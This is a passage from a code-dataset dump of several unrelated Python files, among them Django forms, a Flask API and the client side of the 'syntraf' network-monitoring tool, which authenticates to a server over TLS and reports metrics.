mode='a')\n\n\n\n\n\n\n\n\n","repo_name":"bsavanth/Sentiment-Analysis","sub_path":"Splitting.py","file_name":"Splitting.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"8073882239","text":"#from persist import store, retrieve, bring\nfrom datetime import datetime\n\n\"\"\"\ntake_quiz - provides a module which implements the functions to access\nquiz and quiz attempts by a Student, and the answers to the questions\nthat they provide. Works in use with quizzes created with questions\ncreated by a professor, and with a grading module that will check correct\nanswers.\n\"\"\"\n\nclass Answers():\n \"\"\"\n Provides object with attributes containing information for quiz and answers\n\n attributes:\n ansAttempts - list of lists\n attemptSubmitted - list\n stuID - string\n profID - string\n quizID - string\n quiz - Quiz object\n currentAttempt - int\n \"\"\"\n def __init__(self, stuID, profID, quizID):\n self.ansAttempts = []\n self.attemptSubmitted = []\n self.stuID = stuID\n self.profID = profID\n self.quizID = quizID\n self.currentAttempt = None\n","repo_name":"divaad/Comp-2005","sub_path":"take_quiz.py","file_name":"take_quiz.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22850985673","text":"from django.contrib.auth.models import User\nfrom django import forms\nfrom mainapp.models import AvailableJob, Profile,AvailableWorker\nfrom .models import Mail,UserAdress\n\nclass UserUpdateForm(forms.ModelForm):\n email = forms.EmailField()\n class Meta:\n model = User\n fields = ['username','email','first_name','last_name'] \n def __init__(self, *args, **kwargs):\n super(UserUpdateForm, self).__init__(*args,**kwargs)\n for fieldname in ['username','email','first_name', 'last_name']:\n self.fields[fieldname].help_text = None\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['photo','phone']\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args,**kwargs)\n for fieldname in ['photo','phone']:\n self.fields[fieldname].help_text = None\n\nclass WorkerForm(forms.ModelForm):\n class Meta:\n model = AvailableWorker\n fields = ['phone','id_card','id_number','local_govt','state','country','description']\n def __init__(self, *args, **kwargs):\n super(WorkerForm, self).__init__(*args,**kwargs)\n for fieldname in ['phone','id_card','id_number','local_govt','state','country','description']:\n self.fields[fieldname].help_text = None\n\n\nclass JobForm(forms.ModelForm):\n class Meta:\n model = AvailableJob\n fields = ['type_of_work','local_govt','state','country','description','number_of_workers','cost']\n def __init__(self, *args, **kwargs):\n super(JobForm, self).__init__(*args,**kwargs)\n for fieldname in ['type_of_work','local_govt','state','country','description','number_of_workers','cost']:\n self.fields[fieldname].help_text = None\n \n\n\nclass MailForm(forms.ModelForm):\n class Meta:\n model = Mail\n fields = ['your_name','email_address','phone_number','how_can_we_help_you']\n def __init__(self, *args, **kwargs):\n super(MailForm, self).__init__(*args,**kwargs)\n for fieldname in ['your_name','email_address','phone_number','how_can_we_help_you']:\n self.fields[fieldname].help_text = None\n\n\nclass UserAdressForm(forms.ModelForm):\n class Meta:\n model = UserAdress\n fields = ['detail_address']\n ","repo_name":"Imotechs/greenlandz","sub_path":"users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22037774624","text":"#章末問題5.7\n#AtCoder Educational DP Contest F LCS\n\ns=input()\nt=input()\ndp=[[0]*(len(t)+1) for _ in range(len(s)+1)]\n\nfor i in range(len(s)):\n for j in range(len(t)):\n if s[i]==t[j]:\n dp[i+1][j+1]=dp[i][j]+1\n else:\n dp[i+1][j+1]=max(dp[i][j+1],dp[i+1][j])\n\nAns=\"\"\nsl,tl=len(s),len(t)\nwhile len(Ans)1 and dp[sl-1][tl]==dp[sl][tl]:\n sl-=1\n else: tl-=1\n\nprint(Ans[::-1])","repo_name":"mathandsoon/-_python","sub_path":"drken_book/Chapter5/Exercise/5_7.py","file_name":"5_7.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40734745887","text":"import sys\nimport colorama\nimport configparser\nfrom pygame import mixer\n\nconfig = configparser.ConfigParser()\nconfig.read(r'typetrainer\\settings.ini')\ntry:\n from typetrainer import game, multiplayer_menu, socket_client, text_tools,\\\n texts_generator, menu\nexcept Exception as e:\n print('Game modules not found: \"{}\"'.format(e), file=sys.stderr)\n exit(config['ERR_CODES']['ERROR_MISSING_MODULE'])\n\n\ndef main():\n if len(sys.argv) > 1:\n parse_args(sys.argv[1])\n colorama.init()\n mixer.pre_init(44100, -16, 1, 512)\n mixer.init()\n mixer.Sound.play(mixer.Sound('typetrainer/hello.wav'))\n menu.main_menu()\n\n\ndef parse_args(arg: str):\n if arg == '-h' or arg == '--help':\n menu.show_help()\n menu.exit_game()\n else:\n raise KeyError('Incorrect argument', arg)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jaz7Mutant/Typing-Trainer","sub_path":"TypingTrainer.py","file_name":"TypingTrainer.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24721119400","text":"\"\"\"\napp.py\n -exposes 2 APIs for food dictionary and food record resources\n\"\"\"\n\nfrom flask import Flask\nfrom flask_restful import Api\n\nfrom foodlog.resources.food_record_api import FoodRecordAPI\n#from foodlog.resources.food_dict_api import FoodDictAPI\n\n# instanciate a flask_restful RESTful API app\nAPP = Flask(__name__)\nAPI = Api(APP)\n\n# add resources w/ associated url routes and endpoints\n\nAPI.add_resource(FoodRecordAPI,\n '/foodlog/food-dict/',\n endpoint='food_rec')\n\n#API.add_resource(FoodDictAPI,\n# '/foodlog/food-dict/',\n# endpoint='food_dict')\n\n\n# run the web service in debug mode if this script is executed manually\nif __name__ == '__main__':\n APP.run(debug=True)\n","repo_name":"oostin623/FoodLog","sub_path":"foodlog/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6507535661","text":"# SYNTRAF GLOBAL IMPORT\nimport lib.st_process_and_thread\nfrom lib.st_crypto import *\nfrom lib.st_struct import cl_ifreq\nfrom lib.st_process_and_thread import *\nfrom lib.st_read_toml import read_conf\nfrom lib.st_conf_validation import valid_dir_rsa_keypair, validate_ipv4\nfrom lib.st_obj_cc_client import cc_client\n\nfrom tabulate import tabulate\n# SYNTRAF SERVER IMPORT\nif not CompilationOptions.client_only:\n # from gevent import monkey\n # monkey.patch_all()\n # from gevent import socket\n import socket\n # from gevent.server import StreamServer\n from gevent.pool import Pool\n from lib.st_influxdb import * # import ssl after monkey patch because of urllib3\n\nfrom lib.st_conf_validation import generate_client_config_mesh\n\n# BUILTIN IMPORT\nfrom socketserver import TCPServer, ThreadingMixIn, StreamRequestHandler\nimport logging\nimport sys\nimport time\nimport threading\nimport json\nfrom json import JSONEncoder\nimport select\nfrom lib import st_struct\nimport platform\nimport traceback\nimport pathlib\nimport os\nimport inspect\nimport os.path\nimport re\nimport struct\nfrom datetime import datetime\nfrom copy import copy, deepcopy\nfrom ctypes import *\n\n# PACKAGE IMPORT\nimport ssl # import ssl after monkey patch\nimport json\nimport pytz\nfrom cpuinfo import get_cpu_info\nimport psutil\n\nserver_log = logging.getLogger(\"syntraf.\" + \"lib.st_server\")\nclient_log = logging.getLogger(\"syntraf.\" + \"lib.st_client\")\n\n\n\n\n\n#################################################################################\n### SOCKET RCV\n#################################################################################\ndef sock_rcv(sckt):\n try:\n # Waiting for a size in binary (long addressed on 4bytes)\n size = sckt.recv(4)\n if not size: return None\n\n # Unpacking the 4 bytes to get the size\n # https://docs.python.org/3/library/struct.html\n size_decoded = struct.unpack(\">l\", size)[0]\n\n bytes_left = size_decoded\n data = b''\n while bytes_left >= 1:\n data = data + sckt.recv(bytes_left)\n bytes_left = size_decoded - len(data)\n\n result = json.loads(data)\n return result\n\n except Exception as exc:\n raise exc\n\n\n#################################################################################\n### SOCKET SENDALL\n#################################################################################\ndef sock_send(sckt, payload, command):\n try:\n encoded_payload = json.dumps({'COMMAND': command, 'PAYLOAD': payload}, ensure_ascii=False, default=str).encode(\n \"utf-8\")\n data_size = struct.pack(\">l\", len(encoded_payload))\n\n sckt.sendall(data_size)\n sckt.sendall(encoded_payload)\n return True\n\n except Exception as exc:\n raise exc\n\n\ndef get_system_infos():\n uname = platform.uname()\n python_version = platform.python_version()\n cpu_infos = get_cpu_info()\n cpu_brand = cpu_infos['brand_raw']\n cpu_frequency = cpu_infos['hz_advertised_friendly']\n cpu_count_logical = psutil.cpu_count(logical=True)\n cpu_count_physical = psutil.cpu_count(logical=False)\n memory_mb_physical = round(psutil.virtual_memory().total / 1024 / 1024)\n boot_time = datetime.fromtimestamp(psutil.boot_time()).strftime(\"%Y-%m-%d %H:%M:%S\")\n system_infos = {'SYSTEM': uname.system, 'NODE_NAME': uname.node, 'RELEASE': uname.release, 'VERSION': uname.version,\n 'PROCESSOR': uname.processor, 'PYTHON_VERSION': python_version, 'CPU_LOGICAL': cpu_count_logical,\n 'CPU_PHYSICAL': cpu_count_physical, 'MEMORY_MB': memory_mb_physical, 'BOOT_TIME': boot_time,\n 'CPU_FREQUENCY': cpu_frequency, 'CPU_MODEL': cpu_brand, 'TIMEZONE': DefaultValues.TIMEZONE}\n return system_infos\n\n\ndef client_sck_init(_config):\n ssl_conn = None\n try:\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n set_tcp_ka(s, client_log)\n\n context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n\n # Validating if certificate hostname match\n context.check_hostname = False\n\n # We ask for the server certificate\n context.verify_mode = ssl.CERT_NONE\n\n # Wrapping the socket\n ssl_conn = context.wrap_socket(s, server_side=False, do_handshake_on_connect=True)\n\n client_log.info(f\"TRYING TO CONNECT TO : {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']}\")\n\n valid_ip = False\n while not valid_ip:\n try:\n server_ip_addr = socket.gethostbyname(socket.gethostbyname(_config['CLIENT']['SERVER']))\n if validate_ipv4(server_ip_addr):\n valid_ip = True\n except socket.gaierror as e:\n if e.errno == socket.EAI_AGAIN:\n logging.error(f\"TEMPORARY FAILURE IN NAME RESOLUTION OF {server_ip_addr}\")\n time.sleep(1)\n\n # CONNECT\n ssl_conn.connect((server_ip_addr, int(_config['CLIENT']['SERVER_PORT'])))\n\n if server_ip_addr != _config['CLIENT']['SERVER']:\n client_log.info(f\"CONNECTED TO : {_config['CLIENT']['SERVER']}({server_ip_addr}):{_config['CLIENT']['SERVER_PORT']}\")\n else:\n client_log.info(f\"CONNECTED TO : {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']}\")\n\n except (ConnectionRefusedError, ConnectionResetError) as exc:\n client_log.error(\n f\"ERROR CONNECTING TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} : CONNECTION REFUSED\")\n sys.exit()\n except OSError as exc:\n # Network is unreachable\n if exc.errno == 101:\n client_log.error(\n f\"ERROR CONNECTING TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} : NETWORK UNREACHABLE\")\n sys.exit()\n except Exception as exc:\n client_log.error(f\"client:{type(exc).__name__}:{exc}\", exc_info=True)\n sys.exit()\n\n if ssl_conn is None:\n sys.exit()\n else:\n return ssl_conn\n\n\ndef client_connect_utime(_config):\n try:\n dt = datetime.now()\n timezone = pytz.timezone(DefaultValues.TIMEZONE)\n dt_tz = timezone.localize(dt)\n client_utime = dt_tz.astimezone(pytz.timezone(\"UTC\")).timestamp()\n return client_utime\n except Exception as exc:\n raise exc\n\n\ndef client_detect_type_if():\n pass\n # ifreq = struct.pack('16sh', 'wlan0', 0)\n # flags = struct.unpack('16sh', fcntl.ioctl(sockfd, SIOCGIFFLAGS, ifreq))[1]\n # ifreq.ifr_name = c_char_p(\"wlp4s0\".encode('utf-8'))\n # \"wlp4s0\".encode('utf-8')\n # ifreq.ifr_name = create_string_buffer(b\"wlp4s0\", IFNAMSIZ)\n\n # ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # IFNAMSIZ = 16\n # SIOCGIWNAME = 0x8B01\n # ifreq = st_struct.cl_ifreq()\n #\n # ifreq.ifr_name = b\"wlp4s0\"\n # ifreq.ifr_slave = b\"wlp4s0\"\n # print(b\"wlp4s0\".hex())\n #\n # if sys.platform == \"linux\":\n # try:\n # info = fcntl.ioctl(ss, SIOCGIWNAME, ifreq)\n # print(info)\n # print(\"wireless\")\n # except Exception as exc:\n # print(exc)\n # print(\"not wireless\")\n\n\ndef client_send_auth(_config, client_utime, ssl_conn):\n try:\n # Sending TOKEN and UID for authentication, timestamp and version\n client_log.debug(f\"SENDING GREETING PAYLOAD TO SERVER\")\n payload_greetings = {'TOKEN': _config['CLIENT']['TOKEN'], 'CLIENT_UID': _config['CLIENT']['CLIENT_UID'],\n 'TIMESTAMP': client_utime, 'SYNTRAF_CLIENT_VERSION': DefaultValues.SYNTRAF_VERSION,\n 'PUBLIC_KEY': _config['CLIENT']['PUBLIC_KEY']}\n\n sock_send(ssl_conn, payload_greetings, \"AUTH\")\n received_data = sock_rcv(ssl_conn)\n\n if not received_data is None:\n if received_data['COMMAND'] == \"AUTH_FAILED\":\n client_log.info(f\"AUTHENTICATION FAILED, REASON GIVEN BY SERVER : {received_data['PAYLOAD']}\")\n return False\n else:\n client_log.info(f\"AUTHENTICATION SUCCESSFULL\")\n return True\n\n except Exception as exc:\n raise exc\n\n\ndef client_receive_configuration(_config, ssl_conn, threads_n_processes, config_file_path, cli_parameters):\n try:\n # If successful, receiving configuration!\n client_log.debug(f\"WAITING FOR CONFIGURATION\")\n received_data = sock_rcv(ssl_conn)\n\n # Todo, no received data\n if not received_data is None:\n # If no config for this client\n if received_data['PAYLOAD'] is None:\n client_log.warning(f\"THE SERVER DOES NOT HAVE CONFIG FOR THIS NODE FOR NOW\")\n else:\n client_log.info(f\"NEW CONFIG RECEIVED FROM SERVER\")\n\n # PROJ-A\n # If there is no changes, don't restart!\n read_success, disk_config = read_conf(config_file_path)\n if read_success:\n update_config(received_data, disk_config)\n valid_dir_rsa_keypair(disk_config)\n #valid_dir_logs(disk_config)\n disk_config['GLOBAL']['LOGDIR'] = cli_parameters.log_dir\n\n #client_log.debug(_config)\n #client_log.debug(disk_config)\n\n if disk_config == _config:\n client_log.debug(\"SAME SAME SAME SAME\")\n else:\n client_log.debug(\"DIFF DIFF DIFF DIFF\")\n\n # got new config, close all listeners and connectors because if the server has restarted, all the credentials has been re-initialized\n client_log.debug(f\"CLOSING LISTENERS AND CONNECTORS BEFORE APPLYING NEW CONFIG\")\n from lib.st_process_and_thread import close_listeners_and_connectors\n close_listeners_and_connectors(threads_n_processes, _config)\n\n # update local config\n client_log.debug(f\"UPDATING LOCAL CONFIG WITH CONFIG SENT BY SERVER\")\n update_config(received_data, _config)\n\n # Saving RSA keypair for iperf3 authentication\n client_log.debug(f\"SAVING IPERF3 RSA KEYPAIR\")\n save_credentials(received_data, _config)\n\n client_log.info(\n f\"CONFIG WILL LOAD IN LESS THAN {_config['GLOBAL']['WATCHDOG_CHECK_RATE']} seconds (see : WATCHDOG_CHECK_RATE)\")\n else:\n client_log.info(f\"RECEIVED DATA IS NONE\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_system_infos(ssl_conn):\n try:\n client_log.debug(f\"SENDING SYSTEM INFOS TO SERVER\")\n system_infos = get_system_infos()\n sock_send(ssl_conn, system_infos, \"SYSTEM_INFOS\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_metrics(_config, ssl_conn, dict_data_to_send_to_server):\n try:\n # If we have some metric to save, send them to the server\n # We send a dictionnary to the server in which the key is a hash of the payload, and the payload are the metrics\n # Ounce we receive a ack, the payload will contain a list of all the hashes that were correctly written to disk.\n # Then we delete those key/value pair in our local dictionnary and print a count of how much of the data sent was written.\n\n client_log.debug(f\"AMOUNT OF METRICS TO SEND TO SERVER: {len(dict_data_to_send_to_server)}\")\n if len(dict_data_to_send_to_server) >= 1:\n # we need to extract hash and values as two different list.\n # the server will write as bulk, so once he confirmed everything is written, we can use the list of hash to remove thoses elements from \"dict_data_to_send_to_server\"\n # We extract the dictionary at the same time so that there is no insertion of metrics in between\n dict_data_to_send_to_server_as_array = list(dict_data_to_send_to_server.items())\n keys_of_metrics_to_send_to_server = [x[0] for x in dict_data_to_send_to_server_as_array]\n values_of_metrics_to_send_to_server = [x[1] for x in dict_data_to_send_to_server_as_array]\n\n sock_send(ssl_conn, values_of_metrics_to_send_to_server, \"SAVE_METRIC\")\n client_log.debug(\n f\"METRICS DICTIONARY SENT WITH {len(values_of_metrics_to_send_to_server)} METRIC(S), WAITING FOR CONFIRMATION\")\n received_data = sock_rcv(ssl_conn)\n client_log.debug(\n f\"JUST RECEIVED THE FOLLOWING ANSWER FROM THE SERVER : {received_data['COMMAND']}:{received_data['PAYLOAD']}\")\n if received_data:\n if received_data['PAYLOAD'] == \"OK\":\n client_log.debug((\n f\"SERVER CONFIRMED THAT {len(values_of_metrics_to_send_to_server)} METRIC(S) HAS BEEN WRITEN TO DATABASE\"))\n # removing metrics from local queue as the server has acknowledged having written them to disk\n for id in keys_of_metrics_to_send_to_server:\n # if the dict has attain max length define (DEFAULT_WRITE_QUEUE_BUFFER_DEPTH), it is possible the id is no longer there.\n if id in dict_data_to_send_to_server:\n dict_data_to_send_to_server.pop(id)\n\n elif received_data['PAYLOAD'] == \"NOK\":\n client_log.error(f\"SERVER WAS UNABLE TO WRITE METRICS TO DATABASE\")\n else:\n client_log.error(\n f\"CONNECTION TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} LOST\")\n return False\n return True\n except Exception as exc:\n raise exc\n\n\ndef client_send_heartbeat(ssl_conn):\n try:\n sock_send(ssl_conn, \"\", \"HEARTBEAT\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_system_stats(ssl_conn, obj_stats):\n # We send the system stats to the server\n # Custom classes are not serializable, so dumping obj_stats properties into a dict\n try:\n if obj_stats.hasdata:\n sock_send(ssl_conn, obj_stats.as_dict(), \"SAVE_STATS_METRIC\")\n obj_stats.hasdata = False\n #client_log.debug(f\"SYSTEM STATS SENT TO SERVER\")\n #else:\n #client_log.debug(f\"NO SYSTEM STATS TO SEND TO SERVER\")\n except Exception as exc:\n raise exc\n\n\ndef client_awaiting_command(ssl_conn):\n try:\n # We give the chance to the server to send us an action\n #client_log.debug(f\"BEFORE ASKING FOR COMMAND TO THE SERVER\")\n sock_send(ssl_conn, \"\", \"AWAITING_COMMAND\")\n #client_log.debug(f\"AFTER ASKING FOR COMMAND TO THE SERVER\")\n\n # Receiving the answer\n #client_log.debug(f\"BEFORE RECEIVING COMMAND OR NOP FROM THE SERVER\")\n received_data = sock_rcv(ssl_conn)\n #client_log.debug(f\"AFTER RECEIVING COMMAND OR NOP FROM THE SERVER\")\n except Exception as exc:\n raise exc\n\n return received_data\n\n\ndef client_command_reconnect(ssl_conn):\n \"\"\"\n This function is called when a client receive the COMMAND \"RECONNECT_CLIENT\".\n It close the current socket, then exit the client thread.\n At the next watchdog loop, the client thread will be respawned and the client will reconnect.\n :param ssl_conn: The current ssl socket\n \"\"\"\n try:\n client_log.info(\"RECEIVED A REQUEST FROM THE SERVER TO DISCONNECT\")\n ssl_conn.shutdown(socket.SHUT_RDWR)\n ssl_conn.close()\n client_log.info(\"DISCONNECTED\")\n sys.exit()\n except Exception as exc:\n raise exc\n\n\ndef client_command_restart(ssl_conn):\n \"\"\"\n This function is called when a client receive the COMMAND \"RESTART_CLIENT\".\n It remove the pid lock file, close the current socket and restart the syntraf master process\n It restart differently if it's inside a bundle or not.\n :param ssl_conn: The current ssl socket\n \"\"\"\n try:\n client_log.info(\"RECEIVED A REQUEST FROM THE SERVER TO RESTART\")\n\n # shutting down socket\n ssl_conn.shutdown(socket.SHUT_RDWR)\n ssl_conn.close()\n\n # remove pid file\n pid_file_path = DefaultValues.SYNTRAF_PID_FILE\n pid_file = pathlib.Path(pid_file_path)\n pid_file.unlink()\n\n # if we are inside a pyinstaller bundle\n if getattr(sys, 'frozen', False):\n os.execv(sys.executable, sys.argv)\n # Windows only for now\n else:\n os.execl(sys.executable, 'python', *sys.argv)\n except Exception as exc:\n raise exc\n\n\ndef client_send_thread_status(ssl_conn, threads_n_processes):\n # We send the threads status to the server\n # Custom classes are not serializable, so dumping st_obj_process_n_thread properties into a dict\n try:\n thread_status = {}\n for thr in threads_n_processes:\n if not thr.syntraf_instance_type == \"READ_LOG\":\n thread_status[thr.name + thr.syntraf_instance_type] = thr.asjson()\n\n sock_send(ssl_conn, thread_status, \"SAVE_THREAD_STATUS\")\n #client_log.debug(f\"THREAD STATUS SENT TO SERVER\")\n except Exception as exc:\n raise exc\n\n\ndef client_command_diffconfig(_config, received_data, threads_n_processes):\n try:\n client_log.info(\"RECEIVED A REQUEST TO UPDATE LOCAL CONFIG WITH A DIFFCONFIG\")\n\n # A dynamic client just connected, we need to add his IP address to the local config\n if received_data['PAYLOAD']['ELEMENT'] == \"CLIENT_IP\":\n # In case there was no CONNECTORS associated with that client, there is no IP to update.\n if 'CONNECTORS' in _config:\n for connector_key, connector in _config['CONNECTORS'].items():\n # If a CONNECTOR config match the client_uid, change the destination_address for the one we just received.\n # If we receive a valid IP we do not need to restart the connector, the next loop will launch the process for the first time\n # But if we are setting it to the default IP for dynamic client \"0.0.0.0\", process_and_thread will not start a CONNECTOR when there is that IP assigned. We will take care to terminate the actual CONNECTOR.\n if re.match(\n r\"^.{40}_MEMBER_OF_GROUP_.+_CONNECTING_TO_\" + received_data['PAYLOAD']['CLIENT_UID'] + \"$\",\n connector_key):\n _config['CONNECTORS'][connector_key]['DESTINATION_ADDRESS'] = received_data['PAYLOAD']['IP_ADDRESS']\n client_log.info(\n f\"CONNECTOR: '{connector_key}' DESTINATION IP ADDRESS UPDATED WITH '{received_data['PAYLOAD']['IP_ADDRESS']}'\")\n\n # If we are reverting to unknown dynamic IP client, we should terminate the associated CONNECTOR\n if received_data['PAYLOAD']['IP_ADDRESS'] == \"0.0.0.0\":\n for thr in threads_n_processes:\n if thr.syntraf_instance_type == \"CONNECTOR\" and connector_key in thr.name:\n client_log.info(f\"CONNECTOR: '{connector_key}' TERMINATED BECAUSE IP ADDRESS IS NOW UNKNOWN (CLIENT IS NOT CONNECTED TO SERVER ANYMORE)'\")\n thr.close()\n from lib.st_process_and_thread import terminate_connector_and_childs\n terminate_connector_and_childs(threads_n_processes, connector_key, thr, _config)\n except Exception as exc:\n raise exc\n\n\n#################################################################################\n### MESH CLIENT SOCKET\n#################################################################################\ndef client(_config, stop_thread, dict_data_to_send_to_server, threads_n_processes, obj_stats, config_file_path, cli_parameters):\n\n address = \"0.0.0.0\"\n ssl_conn = None\n try:\n ssl_conn = client_sck_init(_config)\n client_utime = client_connect_utime(_config)\n successful_auth = client_send_auth(_config, client_utime, ssl_conn)\n\n if not successful_auth:\n ssl_conn.close()\n return\n\n client_receive_configuration(_config, ssl_conn, threads_n_processes, config_file_path, cli_parameters)\n client_send_system_infos(ssl_conn)\n\n current_obj_process_n_thread = None\n while not current_obj_process_n_thread:\n if stop_thread[0]: break\n current_obj_process_n_thread = lib.st_process_and_thread.get_obj_process_n_thread(threads_n_processes, \"CLIENT\")\n time.sleep(1)\n\n while True:\n # Update last activity\n current_obj_process_n_thread.last_activity = datetime.now()\n\n if stop_thread[0]: break\n\n client_send_heartbeat(ssl_conn)\n\n client_send_thread_status(ssl_conn, threads_n_processes)\n\n if not client_send_metrics(_config, ssl_conn, dict_data_to_send_to_server): break\n\n client_send_system_stats(ssl_conn, obj_stats)\n\n received_data = client_awaiting_command(ssl_conn)\n\n if not received_data is None:\n if received_data['COMMAND'] == \"RECONNECT_CLIENT\":\n client_command_reconnect(ssl_conn)\n\n if received_data['COMMAND'] == \"RESTART_CLIENT\":\n client_command_restart(ssl_conn)\n\n # We just received a specific part of the configuration that we should change locally.\n elif received_data['COMMAND'] == \"DIFFCONFIG\":\n client_command_diffconfig(_config, received_data, threads_n_processes)\n\n #client_log.debug(f\"SLEEPING FOR {DefaultValues.CONTROL_CHANNEL_HEARTBEAT} SECOND(S)\")\n time.sleep(DefaultValues.CONTROL_CHANNEL_HEARTBEAT)\n # client_log.debug(f\"SLEEP IS OVER\")\n\n else:\n client_log.info(f\"RECEIVED DATA IS NONE\")\n\n except socket.timeout as exc:\n client_log.error(f\"SOCKET TIMEOUT: {address}: CLOSING CONNECTION\")\n except OSError as exc:\n if exc.errno == 32: # BROKEN PIPE, THE OTHER END HAS GONE AWAY\n client_log.error(f\"BROKEN PIPE: {address}: CLOSING CONNECTION\")\n # CONNECTION RESET BY PEER\n elif exc.errno == 104:\n client_log.error(f\"CONNECTION RESET BY PEER: {address}: CLOSING CONNECTION\")\n elif exc.errno == 113:\n client_log.error(f\"NO ROUTE TO HOST: {address}: CLOSING CONNECTION\")\n # CONNECTION TIMEOUT\n elif exc.errno == 110:\n client_log.error(f\"CONNECTION TIMEOUT: {address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10053] #An established connection was aborted by the software in your host machine\n elif exc.errno == 10053:\n client_log.error(f\"CONNECTION ABORTED: {address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10054]\n elif exc.errno == 10054:\n client_log.error(f\"CONNECTION RESET BY PEER: {address}: CLOSING CONNECTION\")\n elif exc.errno == 10057: # FOR WINDOWS [WinError 10057]\n client_log.error(f\"{type(exc).__name__.upper()}:{exc.errno}: {address}: CLOSING CONNECTION\")\n elif exc.errno == 8:\n client_log.error(f\"INVALID SSL CONNECTION. SERVER PROBABLY TERMINATED THE CONNECTION.\")\n else:\n client_log.error(f\"UNHANDLE OSError (st_mesh:sock_rcv): {address}:\", exc, exc.errno, exc.strerror)\n except json.JSONDecodeError as exc:\n client_log.error(f\"JSON DECODING FAILED FOR STRING\")\n except ConnectionResetError as exc:\n client_log.error(f\"CONNECTION TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} LOST\")\n except Exception as exc:\n client_log.error(f\"client:{type(exc).__name__}:{exc}\", exc_info=True)\n finally:\n try:\n ssl_conn.close()\n except Exception as e:\n pass\n\n\ndef validate_clock_skew(_config, received_data, obj_client):\n \"\"\"\n This function compare the time between the server and the client.\n The objective is to show a warning to the user.\n Unsynchronized client will lead to graph not being aligned and make the comparison difficult.\n Plus, iperf3 with RSA does not like clock skew. There is a workaround by setting IPERF3_TIME_SKEW_THRESHOLD,\n but it's preferable to just sync the clock.\n :param _config: The TOML config file (nested dict)\n :param received_data: The payload we just received from the client containing the systems stats metric\n :param obj_client: The object representing the current client\n \"\"\"\n dt = datetime.now()\n timezone = pytz.timezone(DefaultValues.TIMEZONE)\n dt_tz = timezone.localize(dt)\n server_utime = dt_tz.astimezone(pytz.timezone(\"UTC\")).timestamp()\n client_utime = received_data['PAYLOAD']['TIMESTAMP']\n clock_skew = server_utime - client_utime\n obj_client.clock_skew_in_seconds = clock_skew\n if abs(clock_skew) > int(_config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']):\n server_log.warning(\n f\"CONTEXT: {obj_client.client_uid} - CLOCK SKEW BETWEEN CLIENT AND SERVER IS TOO GREAT '{clock_skew} SECONDS'. WARNING : IF THE SAME SKEW HAPPEN BETWEEN NODES, THE IPERF3 CONTROL CHANNEL WILL FAIL. IF YOU CANNOT TIME SYNC THE NODES, YOU CAN ADJUST THE CLOCK OF THE NODES OR CHANGE THE VAR 'SERVER_IPERF3_TIME_SKEW_THRESHOLD'\")\n\n\ndef authenticate_server_client(_config, data, obj_client, sckt):\n valid_token = False\n valid_server_client = False\n ip_addr = sckt.getpeername()[0]\n rejection_explanation = \"\"\n\n for description, token in _config['SERVER']['TOKEN'].items():\n if data['PAYLOAD']['TOKEN'] == token:\n valid_token = True\n\n if is_valid_server_client(_config, data['PAYLOAD']['CLIENT_UID'], sckt):\n valid_server_client = True\n\n if valid_token and valid_server_client:\n server_log.info(\n f\"AUTHENTICATION SUCCESSFUL FROM IP '{ip_addr}' WITH CLIENT_UID '{data['PAYLOAD']['CLIENT_UID']}'\")\n\n # NEW STATUS TRACKING\n obj_client.status = \"CONNECTED\"\n obj_client.status_since = datetime.now()\n\n return True, \"\"\n\n elif valid_token and not valid_server_client:\n # Temporary, testing dynamic IP\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. CLIENT UID INVALID.\")\n rejection_explanation = \"UNKNOWN CLIENT\"\n\n elif not valid_token and valid_server_client:\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. TOKEN INVALID.\")\n rejection_explanation = \"INVALID TOKEN\"\n\n elif not valid_token and not valid_server_client:\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. CLIENT UID AND TOKEN INVALID.\")\n rejection_explanation = \"UNKNOWN CLIENT AND INVALID TOKEN\"\n\n return False, rejection_explanation\n\n\ndef send_config(dict_by_node_generated_config, client_uid, sckt, _config):\n bool_we_have_config_for_this_client = False\n try:\n # Now we can send the configuration of this mesh client\n # First, do we have something to send?\n # Then, IF THE IP ADDRESS AND THE UID ARE EQUAL, WE CAN SEND THIS CONFIGURATION!\n if dict_by_node_generated_config:\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == client_uid:\n if server_client['UID'] in dict_by_node_generated_config:\n 